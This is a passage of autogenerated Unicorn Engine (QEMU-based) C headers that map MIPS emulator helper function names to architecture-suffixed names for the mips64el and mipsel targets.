helper_r6_cmp_d_saf_mips64el #define helper_r6_cmp_d_sun helper_r6_cmp_d_sun_mips64el #define helper_r6_cmp_d_seq helper_r6_cmp_d_seq_mips64el #define helper_r6_cmp_d_sueq helper_r6_cmp_d_sueq_mips64el #define helper_r6_cmp_d_slt helper_r6_cmp_d_slt_mips64el #define helper_r6_cmp_d_sult helper_r6_cmp_d_sult_mips64el #define helper_r6_cmp_d_sle helper_r6_cmp_d_sle_mips64el #define helper_r6_cmp_d_sule helper_r6_cmp_d_sule_mips64el #define helper_r6_cmp_d_or helper_r6_cmp_d_or_mips64el #define helper_r6_cmp_d_une helper_r6_cmp_d_une_mips64el #define helper_r6_cmp_d_ne helper_r6_cmp_d_ne_mips64el #define helper_r6_cmp_d_sor helper_r6_cmp_d_sor_mips64el #define helper_r6_cmp_d_sune helper_r6_cmp_d_sune_mips64el #define helper_r6_cmp_d_sne helper_r6_cmp_d_sne_mips64el #define helper_r6_cmp_s_af 
helper_r6_cmp_s_af_mips64el #define helper_r6_cmp_s_un helper_r6_cmp_s_un_mips64el #define helper_r6_cmp_s_eq helper_r6_cmp_s_eq_mips64el #define helper_r6_cmp_s_ueq helper_r6_cmp_s_ueq_mips64el #define helper_r6_cmp_s_lt helper_r6_cmp_s_lt_mips64el #define helper_r6_cmp_s_ult helper_r6_cmp_s_ult_mips64el #define helper_r6_cmp_s_le helper_r6_cmp_s_le_mips64el #define helper_r6_cmp_s_ule helper_r6_cmp_s_ule_mips64el #define helper_r6_cmp_s_saf helper_r6_cmp_s_saf_mips64el #define helper_r6_cmp_s_sun helper_r6_cmp_s_sun_mips64el #define helper_r6_cmp_s_seq helper_r6_cmp_s_seq_mips64el #define helper_r6_cmp_s_sueq helper_r6_cmp_s_sueq_mips64el #define helper_r6_cmp_s_slt helper_r6_cmp_s_slt_mips64el #define helper_r6_cmp_s_sult helper_r6_cmp_s_sult_mips64el #define helper_r6_cmp_s_sle helper_r6_cmp_s_sle_mips64el #define helper_r6_cmp_s_sule helper_r6_cmp_s_sule_mips64el #define helper_r6_cmp_s_or helper_r6_cmp_s_or_mips64el #define helper_r6_cmp_s_une helper_r6_cmp_s_une_mips64el #define helper_r6_cmp_s_ne helper_r6_cmp_s_ne_mips64el #define helper_r6_cmp_s_sor helper_r6_cmp_s_sor_mips64el #define helper_r6_cmp_s_sune helper_r6_cmp_s_sune_mips64el #define helper_r6_cmp_s_sne helper_r6_cmp_s_sne_mips64el #define no_mmu_map_address no_mmu_map_address_mips64el #define fixed_mmu_map_address fixed_mmu_map_address_mips64el #define r4k_map_address r4k_map_address_mips64el #define cpu_mips_tlb_flush cpu_mips_tlb_flush_mips64el #define sync_c0_status sync_c0_status_mips64el #define cpu_mips_store_status cpu_mips_store_status_mips64el #define cpu_mips_store_cause cpu_mips_store_cause_mips64el #define mips_cpu_get_phys_page_debug mips_cpu_get_phys_page_debug_mips64el #define mips_cpu_tlb_fill mips_cpu_tlb_fill_mips64el #define cpu_mips_translate_address cpu_mips_translate_address_mips64el #define exception_resume_pc exception_resume_pc_mips64el #define mips_cpu_do_interrupt mips_cpu_do_interrupt_mips64el #define mips_cpu_exec_interrupt mips_cpu_exec_interrupt_mips64el #define r4k_invalidate_tlb r4k_invalidate_tlb_mips64el #define do_raise_exception_err do_raise_exception_err_mips64el #define helper_paddsb helper_paddsb_mips64el #define helper_paddusb helper_paddusb_mips64el #define helper_paddsh helper_paddsh_mips64el #define helper_paddush helper_paddush_mips64el #define helper_paddb helper_paddb_mips64el #define helper_paddh helper_paddh_mips64el #define helper_paddw helper_paddw_mips64el #define helper_psubsb helper_psubsb_mips64el #define helper_psubusb helper_psubusb_mips64el #define helper_psubsh helper_psubsh_mips64el #define helper_psubush helper_psubush_mips64el #define helper_psubb helper_psubb_mips64el #define helper_psubh helper_psubh_mips64el #define helper_psubw helper_psubw_mips64el #define helper_pshufh helper_pshufh_mips64el #define helper_packsswh helper_packsswh_mips64el #define helper_packsshb helper_packsshb_mips64el #define helper_packushb helper_packushb_mips64el #define helper_punpcklwd helper_punpcklwd_mips64el #define helper_punpckhwd helper_punpckhwd_mips64el #define helper_punpcklhw helper_punpcklhw_mips64el #define helper_punpckhhw helper_punpckhhw_mips64el #define helper_punpcklbh helper_punpcklbh_mips64el #define helper_punpckhbh helper_punpckhbh_mips64el #define helper_pavgh helper_pavgh_mips64el #define helper_pavgb helper_pavgb_mips64el #define helper_pmaxsh helper_pmaxsh_mips64el #define helper_pminsh helper_pminsh_mips64el #define helper_pmaxub helper_pmaxub_mips64el #define helper_pminub helper_pminub_mips64el #define helper_pcmpeqw helper_pcmpeqw_mips64el #define 
helper_pcmpgtw helper_pcmpgtw_mips64el #define helper_pcmpeqh helper_pcmpeqh_mips64el #define helper_pcmpgth helper_pcmpgth_mips64el #define helper_pcmpeqb helper_pcmpeqb_mips64el #define helper_pcmpgtb helper_pcmpgtb_mips64el #define helper_psllw helper_psllw_mips64el #define helper_psrlw helper_psrlw_mips64el #define helper_psraw helper_psraw_mips64el #define helper_psllh helper_psllh_mips64el #define helper_psrlh helper_psrlh_mips64el #define helper_psrah helper_psrah_mips64el #define helper_pmullh helper_pmullh_mips64el #define helper_pmulhh helper_pmulhh_mips64el #define helper_pmulhuh helper_pmulhuh_mips64el #define helper_pmaddhw helper_pmaddhw_mips64el #define helper_pasubub helper_pasubub_mips64el #define helper_biadd helper_biadd_mips64el #define helper_pmovmskb helper_pmovmskb_mips64el #define helper_msa_nloc_b helper_msa_nloc_b_mips64el #define helper_msa_nloc_h helper_msa_nloc_h_mips64el #define helper_msa_nloc_w helper_msa_nloc_w_mips64el #define helper_msa_nloc_d helper_msa_nloc_d_mips64el #define helper_msa_nlzc_b helper_msa_nlzc_b_mips64el #define helper_msa_nlzc_h helper_msa_nlzc_h_mips64el #define helper_msa_nlzc_w helper_msa_nlzc_w_mips64el #define helper_msa_nlzc_d helper_msa_nlzc_d_mips64el #define helper_msa_pcnt_b helper_msa_pcnt_b_mips64el #define helper_msa_pcnt_h helper_msa_pcnt_h_mips64el #define helper_msa_pcnt_w helper_msa_pcnt_w_mips64el #define helper_msa_pcnt_d helper_msa_pcnt_d_mips64el #define helper_msa_binsl_b helper_msa_binsl_b_mips64el #define helper_msa_binsl_h helper_msa_binsl_h_mips64el #define helper_msa_binsl_w helper_msa_binsl_w_mips64el #define helper_msa_binsl_d helper_msa_binsl_d_mips64el #define helper_msa_binsr_b helper_msa_binsr_b_mips64el #define helper_msa_binsr_h helper_msa_binsr_h_mips64el #define helper_msa_binsr_w helper_msa_binsr_w_mips64el #define helper_msa_binsr_d helper_msa_binsr_d_mips64el #define helper_msa_bmnz_v helper_msa_bmnz_v_mips64el #define helper_msa_bmz_v helper_msa_bmz_v_mips64el #define helper_msa_bsel_v helper_msa_bsel_v_mips64el #define helper_msa_bclr_b helper_msa_bclr_b_mips64el #define helper_msa_bclr_h helper_msa_bclr_h_mips64el #define helper_msa_bclr_w helper_msa_bclr_w_mips64el #define helper_msa_bclr_d helper_msa_bclr_d_mips64el #define helper_msa_bneg_b helper_msa_bneg_b_mips64el #define helper_msa_bneg_h helper_msa_bneg_h_mips64el #define helper_msa_bneg_w helper_msa_bneg_w_mips64el #define helper_msa_bneg_d helper_msa_bneg_d_mips64el #define helper_msa_bset_b helper_msa_bset_b_mips64el #define helper_msa_bset_h helper_msa_bset_h_mips64el #define helper_msa_bset_w helper_msa_bset_w_mips64el #define helper_msa_bset_d helper_msa_bset_d_mips64el #define helper_msa_add_a_b helper_msa_add_a_b_mips64el #define helper_msa_add_a_h helper_msa_add_a_h_mips64el #define helper_msa_add_a_w helper_msa_add_a_w_mips64el #define helper_msa_add_a_d helper_msa_add_a_d_mips64el #define helper_msa_adds_a_b helper_msa_adds_a_b_mips64el #define helper_msa_adds_a_h helper_msa_adds_a_h_mips64el #define helper_msa_adds_a_w helper_msa_adds_a_w_mips64el #define helper_msa_adds_a_d helper_msa_adds_a_d_mips64el #define helper_msa_adds_s_b helper_msa_adds_s_b_mips64el #define helper_msa_adds_s_h helper_msa_adds_s_h_mips64el #define helper_msa_adds_s_w helper_msa_adds_s_w_mips64el #define helper_msa_adds_s_d helper_msa_adds_s_d_mips64el #define helper_msa_adds_u_b helper_msa_adds_u_b_mips64el #define helper_msa_adds_u_h helper_msa_adds_u_h_mips64el #define helper_msa_adds_u_w helper_msa_adds_u_w_mips64el #define helper_msa_adds_u_d 
helper_msa_adds_u_d_mips64el #define helper_msa_addv_b helper_msa_addv_b_mips64el #define helper_msa_addv_h helper_msa_addv_h_mips64el #define helper_msa_addv_w helper_msa_addv_w_mips64el #define helper_msa_addv_d helper_msa_addv_d_mips64el #define helper_msa_hadd_s_h helper_msa_hadd_s_h_mips64el #define helper_msa_hadd_s_w helper_msa_hadd_s_w_mips64el #define helper_msa_hadd_s_d helper_msa_hadd_s_d_mips64el #define helper_msa_hadd_u_h helper_msa_hadd_u_h_mips64el #define helper_msa_hadd_u_w helper_msa_hadd_u_w_mips64el #define helper_msa_hadd_u_d helper_msa_hadd_u_d_mips64el #define helper_msa_ave_s_b helper_msa_ave_s_b_mips64el #define helper_msa_ave_s_h helper_msa_ave_s_h_mips64el #define helper_msa_ave_s_w helper_msa_ave_s_w_mips64el #define helper_msa_ave_s_d helper_msa_ave_s_d_mips64el #define helper_msa_ave_u_b helper_msa_ave_u_b_mips64el #define helper_msa_ave_u_h helper_msa_ave_u_h_mips64el #define helper_msa_ave_u_w helper_msa_ave_u_w_mips64el #define helper_msa_ave_u_d helper_msa_ave_u_d_mips64el #define helper_msa_aver_s_b helper_msa_aver_s_b_mips64el #define helper_msa_aver_s_h helper_msa_aver_s_h_mips64el #define helper_msa_aver_s_w helper_msa_aver_s_w_mips64el #define helper_msa_aver_s_d helper_msa_aver_s_d_mips64el #define helper_msa_aver_u_b helper_msa_aver_u_b_mips64el #define helper_msa_aver_u_h helper_msa_aver_u_h_mips64el #define helper_msa_aver_u_w helper_msa_aver_u_w_mips64el #define helper_msa_aver_u_d helper_msa_aver_u_d_mips64el #define helper_msa_ceq_b helper_msa_ceq_b_mips64el #define helper_msa_ceq_h helper_msa_ceq_h_mips64el #define helper_msa_ceq_w helper_msa_ceq_w_mips64el #define helper_msa_ceq_d helper_msa_ceq_d_mips64el #define helper_msa_cle_s_b helper_msa_cle_s_b_mips64el #define helper_msa_cle_s_h helper_msa_cle_s_h_mips64el #define helper_msa_cle_s_w helper_msa_cle_s_w_mips64el #define helper_msa_cle_s_d helper_msa_cle_s_d_mips64el #define helper_msa_cle_u_b helper_msa_cle_u_b_mips64el #define helper_msa_cle_u_h helper_msa_cle_u_h_mips64el #define helper_msa_cle_u_w helper_msa_cle_u_w_mips64el #define helper_msa_cle_u_d helper_msa_cle_u_d_mips64el #define helper_msa_clt_s_b helper_msa_clt_s_b_mips64el #define helper_msa_clt_s_h helper_msa_clt_s_h_mips64el #define helper_msa_clt_s_w helper_msa_clt_s_w_mips64el #define helper_msa_clt_s_d helper_msa_clt_s_d_mips64el #define helper_msa_clt_u_b helper_msa_clt_u_b_mips64el #define helper_msa_clt_u_h helper_msa_clt_u_h_mips64el #define helper_msa_clt_u_w helper_msa_clt_u_w_mips64el #define helper_msa_clt_u_d helper_msa_clt_u_d_mips64el #define helper_msa_div_s_b helper_msa_div_s_b_mips64el #define helper_msa_div_s_h helper_msa_div_s_h_mips64el #define helper_msa_div_s_w helper_msa_div_s_w_mips64el #define helper_msa_div_s_d helper_msa_div_s_d_mips64el #define helper_msa_div_u_b helper_msa_div_u_b_mips64el #define helper_msa_div_u_h helper_msa_div_u_h_mips64el #define helper_msa_div_u_w helper_msa_div_u_w_mips64el #define helper_msa_div_u_d helper_msa_div_u_d_mips64el #define helper_msa_max_a_b helper_msa_max_a_b_mips64el #define helper_msa_max_a_h helper_msa_max_a_h_mips64el #define helper_msa_max_a_w helper_msa_max_a_w_mips64el #define helper_msa_max_a_d helper_msa_max_a_d_mips64el #define helper_msa_max_s_b helper_msa_max_s_b_mips64el #define helper_msa_max_s_h helper_msa_max_s_h_mips64el #define helper_msa_max_s_w helper_msa_max_s_w_mips64el #define helper_msa_max_s_d helper_msa_max_s_d_mips64el #define helper_msa_max_u_b helper_msa_max_u_b_mips64el #define helper_msa_max_u_h helper_msa_max_u_h_mips64el 
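/* helper_msa_*: QEMU helpers implementing the MIPS SIMD Architecture (MSA) vector instructions. */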
#define helper_msa_max_u_w helper_msa_max_u_w_mips64el #define helper_msa_max_u_d helper_msa_max_u_d_mips64el #define helper_msa_min_a_b helper_msa_min_a_b_mips64el #define helper_msa_min_a_h helper_msa_min_a_h_mips64el #define helper_msa_min_a_w helper_msa_min_a_w_mips64el #define helper_msa_min_a_d helper_msa_min_a_d_mips64el #define helper_msa_min_s_b helper_msa_min_s_b_mips64el #define helper_msa_min_s_h helper_msa_min_s_h_mips64el #define helper_msa_min_s_w helper_msa_min_s_w_mips64el #define helper_msa_min_s_d helper_msa_min_s_d_mips64el #define helper_msa_min_u_b helper_msa_min_u_b_mips64el #define helper_msa_min_u_h helper_msa_min_u_h_mips64el #define helper_msa_min_u_w helper_msa_min_u_w_mips64el #define helper_msa_min_u_d helper_msa_min_u_d_mips64el #define helper_msa_mod_s_b helper_msa_mod_s_b_mips64el #define helper_msa_mod_s_h helper_msa_mod_s_h_mips64el #define helper_msa_mod_s_w helper_msa_mod_s_w_mips64el #define helper_msa_mod_s_d helper_msa_mod_s_d_mips64el #define helper_msa_mod_u_b helper_msa_mod_u_b_mips64el #define helper_msa_mod_u_h helper_msa_mod_u_h_mips64el #define helper_msa_mod_u_w helper_msa_mod_u_w_mips64el #define helper_msa_mod_u_d helper_msa_mod_u_d_mips64el #define helper_msa_asub_s_b helper_msa_asub_s_b_mips64el #define helper_msa_asub_s_h helper_msa_asub_s_h_mips64el #define helper_msa_asub_s_w helper_msa_asub_s_w_mips64el #define helper_msa_asub_s_d helper_msa_asub_s_d_mips64el #define helper_msa_asub_u_b helper_msa_asub_u_b_mips64el #define helper_msa_asub_u_h helper_msa_asub_u_h_mips64el #define helper_msa_asub_u_w helper_msa_asub_u_w_mips64el #define helper_msa_asub_u_d helper_msa_asub_u_d_mips64el #define helper_msa_hsub_s_h helper_msa_hsub_s_h_mips64el #define helper_msa_hsub_s_w helper_msa_hsub_s_w_mips64el #define helper_msa_hsub_s_d helper_msa_hsub_s_d_mips64el #define helper_msa_hsub_u_h helper_msa_hsub_u_h_mips64el #define helper_msa_hsub_u_w helper_msa_hsub_u_w_mips64el #define helper_msa_hsub_u_d helper_msa_hsub_u_d_mips64el #define helper_msa_ilvev_b helper_msa_ilvev_b_mips64el #define helper_msa_ilvev_h helper_msa_ilvev_h_mips64el #define helper_msa_ilvev_w helper_msa_ilvev_w_mips64el #define helper_msa_ilvev_d helper_msa_ilvev_d_mips64el #define helper_msa_ilvod_b helper_msa_ilvod_b_mips64el #define helper_msa_ilvod_h helper_msa_ilvod_h_mips64el #define helper_msa_ilvod_w helper_msa_ilvod_w_mips64el #define helper_msa_ilvod_d helper_msa_ilvod_d_mips64el #define helper_msa_ilvl_b helper_msa_ilvl_b_mips64el #define helper_msa_ilvl_h helper_msa_ilvl_h_mips64el #define helper_msa_ilvl_w helper_msa_ilvl_w_mips64el #define helper_msa_ilvl_d helper_msa_ilvl_d_mips64el #define helper_msa_ilvr_b helper_msa_ilvr_b_mips64el #define helper_msa_ilvr_h helper_msa_ilvr_h_mips64el #define helper_msa_ilvr_w helper_msa_ilvr_w_mips64el #define helper_msa_ilvr_d helper_msa_ilvr_d_mips64el #define helper_msa_and_v helper_msa_and_v_mips64el #define helper_msa_nor_v helper_msa_nor_v_mips64el #define helper_msa_or_v helper_msa_or_v_mips64el #define helper_msa_xor_v helper_msa_xor_v_mips64el #define helper_msa_move_v helper_msa_move_v_mips64el #define helper_msa_pckev_b helper_msa_pckev_b_mips64el #define helper_msa_pckev_h helper_msa_pckev_h_mips64el #define helper_msa_pckev_w helper_msa_pckev_w_mips64el #define helper_msa_pckev_d helper_msa_pckev_d_mips64el #define helper_msa_pckod_b helper_msa_pckod_b_mips64el #define helper_msa_pckod_h helper_msa_pckod_h_mips64el #define helper_msa_pckod_w helper_msa_pckod_w_mips64el #define helper_msa_pckod_d 
helper_msa_pckod_d_mips64el #define helper_msa_sll_b helper_msa_sll_b_mips64el #define helper_msa_sll_h helper_msa_sll_h_mips64el #define helper_msa_sll_w helper_msa_sll_w_mips64el #define helper_msa_sll_d helper_msa_sll_d_mips64el #define helper_msa_sra_b helper_msa_sra_b_mips64el #define helper_msa_sra_h helper_msa_sra_h_mips64el #define helper_msa_sra_w helper_msa_sra_w_mips64el #define helper_msa_sra_d helper_msa_sra_d_mips64el #define helper_msa_srar_b helper_msa_srar_b_mips64el #define helper_msa_srar_h helper_msa_srar_h_mips64el #define helper_msa_srar_w helper_msa_srar_w_mips64el #define helper_msa_srar_d helper_msa_srar_d_mips64el #define helper_msa_srl_b helper_msa_srl_b_mips64el #define helper_msa_srl_h helper_msa_srl_h_mips64el #define helper_msa_srl_w helper_msa_srl_w_mips64el #define helper_msa_srl_d helper_msa_srl_d_mips64el #define helper_msa_srlr_b helper_msa_srlr_b_mips64el #define helper_msa_srlr_h helper_msa_srlr_h_mips64el #define helper_msa_srlr_w helper_msa_srlr_w_mips64el #define helper_msa_srlr_d helper_msa_srlr_d_mips64el #define helper_msa_andi_b helper_msa_andi_b_mips64el #define helper_msa_ori_b helper_msa_ori_b_mips64el #define helper_msa_nori_b helper_msa_nori_b_mips64el #define helper_msa_xori_b helper_msa_xori_b_mips64el #define helper_msa_bmnzi_b helper_msa_bmnzi_b_mips64el #define helper_msa_bmzi_b helper_msa_bmzi_b_mips64el #define helper_msa_bseli_b helper_msa_bseli_b_mips64el #define helper_msa_shf_df helper_msa_shf_df_mips64el #define helper_msa_addvi_df helper_msa_addvi_df_mips64el #define helper_msa_subvi_df helper_msa_subvi_df_mips64el #define helper_msa_ceqi_df helper_msa_ceqi_df_mips64el #define helper_msa_clei_s_df helper_msa_clei_s_df_mips64el #define helper_msa_clei_u_df helper_msa_clei_u_df_mips64el #define helper_msa_clti_s_df helper_msa_clti_s_df_mips64el #define helper_msa_clti_u_df helper_msa_clti_u_df_mips64el #define helper_msa_maxi_s_df helper_msa_maxi_s_df_mips64el #define helper_msa_maxi_u_df helper_msa_maxi_u_df_mips64el #define helper_msa_mini_s_df helper_msa_mini_s_df_mips64el #define helper_msa_mini_u_df helper_msa_mini_u_df_mips64el #define helper_msa_ldi_df helper_msa_ldi_df_mips64el #define helper_msa_slli_df helper_msa_slli_df_mips64el #define helper_msa_srai_df helper_msa_srai_df_mips64el #define helper_msa_srli_df helper_msa_srli_df_mips64el #define helper_msa_bclri_df helper_msa_bclri_df_mips64el #define helper_msa_bseti_df helper_msa_bseti_df_mips64el #define helper_msa_bnegi_df helper_msa_bnegi_df_mips64el #define helper_msa_sat_s_df helper_msa_sat_s_df_mips64el #define helper_msa_sat_u_df helper_msa_sat_u_df_mips64el #define helper_msa_srari_df helper_msa_srari_df_mips64el #define helper_msa_srlri_df helper_msa_srlri_df_mips64el #define helper_msa_binsli_df helper_msa_binsli_df_mips64el #define helper_msa_binsri_df helper_msa_binsri_df_mips64el #define helper_msa_subv_df helper_msa_subv_df_mips64el #define helper_msa_subs_s_df helper_msa_subs_s_df_mips64el #define helper_msa_subs_u_df helper_msa_subs_u_df_mips64el #define helper_msa_subsus_u_df helper_msa_subsus_u_df_mips64el #define helper_msa_subsuu_s_df helper_msa_subsuu_s_df_mips64el #define helper_msa_mulv_df helper_msa_mulv_df_mips64el #define helper_msa_dotp_s_df helper_msa_dotp_s_df_mips64el #define helper_msa_dotp_u_df helper_msa_dotp_u_df_mips64el #define helper_msa_mul_q_df helper_msa_mul_q_df_mips64el #define helper_msa_mulr_q_df helper_msa_mulr_q_df_mips64el #define helper_msa_sld_df helper_msa_sld_df_mips64el #define helper_msa_maddv_df 
helper_msa_maddv_df_mips64el #define helper_msa_msubv_df helper_msa_msubv_df_mips64el #define helper_msa_dpadd_s_df helper_msa_dpadd_s_df_mips64el #define helper_msa_dpadd_u_df helper_msa_dpadd_u_df_mips64el #define helper_msa_dpsub_s_df helper_msa_dpsub_s_df_mips64el #define helper_msa_dpsub_u_df helper_msa_dpsub_u_df_mips64el #define helper_msa_binsl_df helper_msa_binsl_df_mips64el #define helper_msa_binsr_df helper_msa_binsr_df_mips64el #define helper_msa_madd_q_df helper_msa_madd_q_df_mips64el #define helper_msa_msub_q_df helper_msa_msub_q_df_mips64el #define helper_msa_maddr_q_df helper_msa_maddr_q_df_mips64el #define helper_msa_msubr_q_df helper_msa_msubr_q_df_mips64el #define helper_msa_splat_df helper_msa_splat_df_mips64el #define helper_msa_vshf_df helper_msa_vshf_df_mips64el #define helper_msa_sldi_df helper_msa_sldi_df_mips64el #define helper_msa_splati_df helper_msa_splati_df_mips64el #define helper_msa_copy_s_b helper_msa_copy_s_b_mips64el #define helper_msa_copy_s_h helper_msa_copy_s_h_mips64el #define helper_msa_copy_s_w helper_msa_copy_s_w_mips64el #define helper_msa_copy_s_d helper_msa_copy_s_d_mips64el #define helper_msa_copy_u_b helper_msa_copy_u_b_mips64el #define helper_msa_copy_u_h helper_msa_copy_u_h_mips64el #define helper_msa_copy_u_w helper_msa_copy_u_w_mips64el #define helper_msa_insert_b helper_msa_insert_b_mips64el #define helper_msa_insert_h helper_msa_insert_h_mips64el #define helper_msa_insert_w helper_msa_insert_w_mips64el #define helper_msa_insert_d helper_msa_insert_d_mips64el #define helper_msa_insve_df helper_msa_insve_df_mips64el #define helper_msa_ctcmsa helper_msa_ctcmsa_mips64el #define helper_msa_cfcmsa helper_msa_cfcmsa_mips64el #define helper_msa_fill_df helper_msa_fill_df_mips64el #define helper_msa_fcaf_df helper_msa_fcaf_df_mips64el #define helper_msa_fcun_df helper_msa_fcun_df_mips64el #define helper_msa_fceq_df helper_msa_fceq_df_mips64el #define helper_msa_fcueq_df helper_msa_fcueq_df_mips64el #define helper_msa_fclt_df helper_msa_fclt_df_mips64el #define helper_msa_fcult_df helper_msa_fcult_df_mips64el #define helper_msa_fcle_df helper_msa_fcle_df_mips64el #define helper_msa_fcule_df helper_msa_fcule_df_mips64el #define helper_msa_fsaf_df helper_msa_fsaf_df_mips64el #define helper_msa_fsun_df helper_msa_fsun_df_mips64el #define helper_msa_fseq_df helper_msa_fseq_df_mips64el #define helper_msa_fsueq_df helper_msa_fsueq_df_mips64el #define helper_msa_fslt_df helper_msa_fslt_df_mips64el #define helper_msa_fsult_df helper_msa_fsult_df_mips64el #define helper_msa_fsle_df helper_msa_fsle_df_mips64el #define helper_msa_fsule_df helper_msa_fsule_df_mips64el #define helper_msa_fcor_df helper_msa_fcor_df_mips64el #define helper_msa_fcune_df helper_msa_fcune_df_mips64el #define helper_msa_fcne_df helper_msa_fcne_df_mips64el #define helper_msa_fsor_df helper_msa_fsor_df_mips64el #define helper_msa_fsune_df helper_msa_fsune_df_mips64el #define helper_msa_fsne_df helper_msa_fsne_df_mips64el #define helper_msa_fadd_df helper_msa_fadd_df_mips64el #define helper_msa_fsub_df helper_msa_fsub_df_mips64el #define helper_msa_fmul_df helper_msa_fmul_df_mips64el #define helper_msa_fdiv_df helper_msa_fdiv_df_mips64el #define helper_msa_fmadd_df helper_msa_fmadd_df_mips64el #define helper_msa_fmsub_df helper_msa_fmsub_df_mips64el #define helper_msa_fexp2_df helper_msa_fexp2_df_mips64el #define helper_msa_fexdo_df helper_msa_fexdo_df_mips64el #define helper_msa_ftq_df helper_msa_ftq_df_mips64el #define helper_msa_fmin_df helper_msa_fmin_df_mips64el #define 
helper_msa_fmin_a_df helper_msa_fmin_a_df_mips64el #define helper_msa_fmax_df helper_msa_fmax_df_mips64el #define helper_msa_fmax_a_df helper_msa_fmax_a_df_mips64el #define helper_msa_fclass_df helper_msa_fclass_df_mips64el #define helper_msa_ftrunc_s_df helper_msa_ftrunc_s_df_mips64el #define helper_msa_ftrunc_u_df helper_msa_ftrunc_u_df_mips64el #define helper_msa_fsqrt_df helper_msa_fsqrt_df_mips64el #define helper_msa_frsqrt_df helper_msa_frsqrt_df_mips64el #define helper_msa_frcp_df helper_msa_frcp_df_mips64el #define helper_msa_frint_df helper_msa_frint_df_mips64el #define helper_msa_flog2_df helper_msa_flog2_df_mips64el #define helper_msa_fexupl_df helper_msa_fexupl_df_mips64el #define helper_msa_fexupr_df helper_msa_fexupr_df_mips64el #define helper_msa_ffql_df helper_msa_ffql_df_mips64el #define helper_msa_ffqr_df helper_msa_ffqr_df_mips64el #define helper_msa_ftint_s_df helper_msa_ftint_s_df_mips64el #define helper_msa_ftint_u_df helper_msa_ftint_u_df_mips64el #define helper_msa_ffint_s_df helper_msa_ffint_s_df_mips64el #define helper_msa_ffint_u_df helper_msa_ffint_u_df_mips64el #define helper_raise_exception_err helper_raise_exception_err_mips64el #define helper_raise_exception helper_raise_exception_mips64el #define helper_raise_exception_debug helper_raise_exception_debug_mips64el #define helper_muls helper_muls_mips64el #define helper_mulsu helper_mulsu_mips64el #define helper_macc helper_macc_mips64el #define helper_macchi helper_macchi_mips64el #define helper_maccu helper_maccu_mips64el #define helper_macchiu helper_macchiu_mips64el #define helper_msac helper_msac_mips64el #define helper_msachi helper_msachi_mips64el #define helper_msacu helper_msacu_mips64el #define helper_msachiu helper_msachiu_mips64el #define helper_mulhi helper_mulhi_mips64el #define helper_mulhiu helper_mulhiu_mips64el #define helper_mulshi helper_mulshi_mips64el #define helper_mulshiu helper_mulshiu_mips64el #define helper_dbitswap helper_dbitswap_mips64el #define helper_bitswap helper_bitswap_mips64el #define helper_rotx helper_rotx_mips64el #define helper_ll helper_ll_mips64el #define helper_lld helper_lld_mips64el #define helper_swl helper_swl_mips64el #define helper_swr helper_swr_mips64el #define helper_sdl helper_sdl_mips64el #define helper_sdr helper_sdr_mips64el #define helper_lwm helper_lwm_mips64el #define helper_swm helper_swm_mips64el #define helper_ldm helper_ldm_mips64el #define helper_sdm helper_sdm_mips64el #define helper_fork helper_fork_mips64el #define helper_yield helper_yield_mips64el #define r4k_helper_tlbinv r4k_helper_tlbinv_mips64el #define r4k_helper_tlbinvf r4k_helper_tlbinvf_mips64el #define r4k_helper_tlbwi r4k_helper_tlbwi_mips64el #define r4k_helper_tlbwr r4k_helper_tlbwr_mips64el #define r4k_helper_tlbp r4k_helper_tlbp_mips64el #define r4k_helper_tlbr r4k_helper_tlbr_mips64el #define helper_tlbwi helper_tlbwi_mips64el #define helper_tlbwr helper_tlbwr_mips64el #define helper_tlbp helper_tlbp_mips64el #define helper_tlbr helper_tlbr_mips64el #define helper_tlbinv helper_tlbinv_mips64el #define helper_tlbinvf helper_tlbinvf_mips64el #define helper_ginvt helper_ginvt_mips64el #define helper_di helper_di_mips64el #define helper_ei helper_ei_mips64el #define helper_eret helper_eret_mips64el #define helper_eretnc helper_eretnc_mips64el #define helper_deret helper_deret_mips64el #define helper_rdhwr_cpunum helper_rdhwr_cpunum_mips64el #define helper_rdhwr_synci_step helper_rdhwr_synci_step_mips64el #define helper_rdhwr_cc helper_rdhwr_cc_mips64el #define helper_rdhwr_ccres 
helper_rdhwr_ccres_mips64el #define helper_rdhwr_performance helper_rdhwr_performance_mips64el #define helper_rdhwr_xnp helper_rdhwr_xnp_mips64el #define helper_pmon helper_pmon_mips64el #define helper_wait helper_wait_mips64el #define mips_cpu_do_unaligned_access mips_cpu_do_unaligned_access_mips64el #define mips_cpu_do_transaction_failed mips_cpu_do_transaction_failed_mips64el #define helper_msa_ld_b helper_msa_ld_b_mips64el #define helper_msa_ld_h helper_msa_ld_h_mips64el #define helper_msa_ld_w helper_msa_ld_w_mips64el #define helper_msa_ld_d helper_msa_ld_d_mips64el #define helper_msa_st_b helper_msa_st_b_mips64el #define helper_msa_st_h helper_msa_st_h_mips64el #define helper_msa_st_w helper_msa_st_w_mips64el #define helper_msa_st_d helper_msa_st_d_mips64el #define helper_cache helper_cache_mips64el #define gen_intermediate_code gen_intermediate_code_mips64el #define mips_tcg_init mips_tcg_init_mips64el #define cpu_mips_realize_env cpu_mips_realize_env_mips64el #define cpu_state_reset cpu_state_reset_mips64el #define restore_state_to_opc restore_state_to_opc_mips64el #define ieee_rm ieee_rm_mips64el #define mips_defs mips_defs_mips64el #define mips_defs_number mips_defs_number_mips64el #define gen_helper_float_class_s gen_helper_float_class_s_mips64el #define gen_helper_float_class_d gen_helper_float_class_d_mips64el #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/mipsel.h�������������������������������������������������������������������������0000664�0000000�0000000�00000402103�14675241067�0015615�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_mipsel_H #define UNICORN_AUTOGEN_mipsel_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _mipsel #endif #define unicorn_fill_tlb unicorn_fill_tlb_mipsel #define reg_read reg_read_mipsel #define reg_write reg_write_mipsel #define uc_init uc_init_mipsel #define uc_add_inline_hook uc_add_inline_hook_mipsel #define uc_del_inline_hook uc_del_inline_hook_mipsel #define tb_invalidate_phys_range tb_invalidate_phys_range_mipsel #define use_idiv_instructions use_idiv_instructions_mipsel #define arm_arch arm_arch_mipsel #define tb_target_set_jmp_target tb_target_set_jmp_target_mipsel #define have_bmi1 have_bmi1_mipsel #define have_popcnt have_popcnt_mipsel #define have_avx1 have_avx1_mipsel #define have_avx2 have_avx2_mipsel #define have_isa have_isa_mipsel #define have_altivec have_altivec_mipsel 